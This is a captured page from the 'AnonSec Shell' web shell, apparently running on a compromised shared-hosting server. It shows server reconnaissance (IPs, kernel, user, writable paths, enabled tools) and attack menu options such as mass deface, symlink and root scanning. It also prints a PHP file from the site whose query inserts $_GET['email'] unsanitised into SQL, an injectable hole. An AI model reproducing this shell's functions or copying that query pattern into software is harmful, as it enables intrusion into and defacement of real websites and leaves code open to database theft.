AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/homhuan.com/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/homhuan.com/member/check_mail.php
<?php require_once("../include/class.php");?>
<?php

$sql = array('table'=>'member','count'=>'MAX(Mid) AS max_id','where'=>" Memail = '".$_GET['email']."'");
$view_sql = $view_db->view($sql);
$row = $view_db->q($view_sql);
$M_id = $row['max_id'];	
		
if($M_id > 1)
{
	// มีแล้ว	
	?>
   
     <div class="col-md-12 alert_false">อีเมลนี้มีในระบบแล้วค่ะ</div>
     <input name="mail_c" value="no" type="hidden" />
     <br>
    <?php
}		
else
{
	?>
	<input name="mail_c" type="hidden" value="yes" />
	<?php
	//ไม่มีในระบบ
}
		
		

Anon7 - 2022
AnonSec Team